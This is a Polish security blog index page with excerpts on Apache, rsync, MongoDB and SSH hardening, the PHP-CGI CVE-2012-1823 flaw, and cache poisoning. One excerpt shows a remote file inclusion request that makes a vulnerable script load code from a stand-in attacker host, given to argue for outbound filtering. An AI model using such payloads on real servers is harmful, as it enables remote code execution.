NFsec Logo

Apache – podstawowy poziom bezpieczeństwa – podsumowanie

02/03/2014 w Bezpieczeństwo Możliwość komentowania Apache – podstawowy poziom bezpieczeństwa – podsumowanie została wyłączona

G

dybym miał na dzisiejszy dzień zapewnić podstawowy poziom bezpieczeństwa swojego serwera WWW – po standardowej instalacji z paczki zacząłbym od kilku rzeczy:
[ czytaj całość… ]

Zabezpiecz swoje udziały eRsynkowe, proszę

13/02/2014 w Bezpieczeństwo Możliwość komentowania Zabezpiecz swoje udziały eRsynkowe, proszę została wyłączona

S

teve Kemp jakiś czas temu zaczął prowadzić badania nad publicznie dostępnymi serwerami rsync – myśląc, że fajnym pomysłem będzie napisanie do nich silnika wyszukiwania. Dzisiaj porzucił ten projekt. Dlaczego? Ponieważ, jak się okazało w Internecie jest zbyt wiele serwerów rsync zawierających poufne i osobiste dane (np. kopie zapasowe komputerów, strony www z bazami danych SQL itd.).
[ czytaj całość… ]

Apache HTTPD: ETag Inode Information Leakage

02/02/2014 w Bezpieczeństwo Możliwość komentowania Apache HTTPD: ETag Inode Information Leakage została wyłączona

J

eśli używamy serwera Apache możemy wykorzystać w jego komunikacji z przeglądarką ETagi (ang. Entity Tag) dla statycznych zasobów serwowanych z dysku naszego serwera. Służą one między innymi serwerowi Apache do porównywania ich wartości z nagłówkiem If-None-Match i zwracania w zależności od wyniku kodu: 304 Not modified lub 200 OK. Niestety od wersji 1.3.22 do 2.3.14 tego serwera w konstrukcji pola ETag używany jest numer i-node pliku, do którego zostało wykonane odwołanie.
[ czytaj całość… ]

Ograniczanie dostępu do MongoDB w środowisku chmury

23/12/2013 w Administracja, Bezpieczeństwo Możliwość komentowania Ograniczanie dostępu do MongoDB w środowisku chmury została wyłączona

A

ktualnie baza MongoDB (v2.4.8) nie posiada możliwości ograniczenia dostępu do wybranych adresów IP na poziomie warstwy aplikacji. Mechanizmem, który można szybko do tego wykorzystać jest netfilter. Daje się on szybko dostosować szczególnie w środowisku wirtualizacji, w którym maszyna wirtualna posiada zmienny, wewnętrzny adres IP na interfejsie eth0 – a jej zewnętrzny adres przechodzi przez mechanizm NAT.
[ czytaj całość… ]

CVE-2012-1823 – Apache / PHP5.x Remote Code Execution Exploit

09/12/2013 w Bezpieczeństwo Możliwość komentowania CVE-2012-1823 – Apache / PHP5.x Remote Code Execution Exploit została wyłączona

W

maju 2012 roku opublikowano lukę w PHP CVE-2012-1823. Dotyczy ona tylko serwerów, które posiadają skonfigurowaną obsługę języka PHP jako skrypty CGI. Chociaż nie jest to domyślna konfiguracja w większości systemów – w takich dystrybucjach jak Debian i Ubuntu instalując paczkę php5-cgi i zostawiając domyślne ustawienia serwera Apache – pozwalające na dostępność binarnych plików w ścieżce http://serwer/cgi-bin/php5 wystawiamy nasz serwer na eksplorację luki. O zasadzie luki możemy przeczytać tutaj.
[ czytaj całość… ]

Apache – blokowanie połączeń wychodzących aplikacji z iptables

25/11/2013 w Bezpieczeństwo Możliwość komentowania Apache – blokowanie połączeń wychodzących aplikacji z iptables została wyłączona

S

erwer WWW głównie akceptuje połączenia przychodzące od użytkowników, a sam niekiedy potrzebuje nawiązać nowe połączenia z zewnętrznymi zasobami np. bazą danych. Dlatego dobrze znając architekturę aplikacji – warto ograniczyć jej połączenia wychodzące tylko do tych, które są jej rzeczywiście niezbędne. To sprawia, że tak wyprofilowana sieciowo aplikacja staje się trudniejsza do zdobycia na przykład przez atakującego, który chce wykorzystać atak z wykorzystaniem zewnętrznych zasobów:

/podatny_kod.php?bug=http://evilhacker.net/exploit?

[ czytaj całość… ]

Nmap widzi przez iptables?

23/11/2013 w Bezpieczeństwo Możliwość komentowania Nmap widzi przez iptables? została wyłączona

Z

ałóżmy, że na moim serwerze posiadam zainstalowany tylko serwer MySQL, który nasłuchuje na wszystkich interfejsach (zewnętrzny / wewnętrzny / lokalny). Jednak za pomocą netfilter ograniczam do niego dostęp tylko do interfejsu zwrotnego, a w przyszłości wybiorę kolejne adresy IP, które będą mogły się z nim łączyć. Wydaje proste polecenie iptables:

iptables -A INPUT -p tcp --dport 3306 ! -s 127.0.0.1 -j DROP

A więc mój firewall wygląda następująco:

[root@darkstar ~]# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere
DROP       tcp  -- !localhost.localdomain  anywhere            tcp dpt:mysql

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere

[ czytaj całość… ]

Dlaczego umieszczanie SSH na innym porcie to dobry pomysł

26/10/2013 w Bezpieczeństwo Możliwość komentowania Dlaczego umieszczanie SSH na innym porcie to dobry pomysł została wyłączona

J

akiś czas temu na Hacker News pojawił się artykuł próbujący udowodnić, że uruchamianie daemona SSH na innym porcie niż 22 (Opcja: Port w /etc/ssh/sshd_config) to zły pomysł. Czy na pewno? Autor głównie skupił się w swoich wywodach na argumencie security by obscurity, co jest ulubionym ryżym śledziem ludzi, którzy prawie rozumieją to zagadnienie.
[ czytaj całość… ]

Ciastka bez ciasta

19/08/2013 w Bezpieczeństwo Możliwość komentowania Ciastka bez ciasta została wyłączona

O

prócz wszystkich znanych metod śledzenia użytkowników w Internecie tj. ciasteczek, javascript, localstorage, sessionstorage, globalstorage, flash, adresu ip, user agentów, czy metody opracowanej przez Panopticlick doszła kolejna – wykorzystująca inną przestrzeń do przechowywania danych, która jest trwała między ponownym uruchomieniem przeglądarki: pamięć cache.
[ czytaj całość… ]

HTTP Cache Poisoning via Host Header Injection

27/06/2013 w Ataki Internetowe, Bezpieczeństwo Możliwość komentowania HTTP Cache Poisoning via Host Header Injection została wyłączona

P

owszechną praktyką wśród programistów piszących własne webaplikacje oraz webowych frameworków odkrywających koło od nowa jest poleganie na wartościach zwracanych w nagłówku HTTP Host. Jest to bardzo wygodny sposób na gwarancję, że ta sama aplikacja zostanie uruchomiona na localhoście, serwerach środowiska: developerskiego, testowego, produkcyjnego, innych domenach i subdomenach itd., bez wprowadzania modyfikacji w kod aplikacji. Prosty przykład w PHP:
[ czytaj całość… ]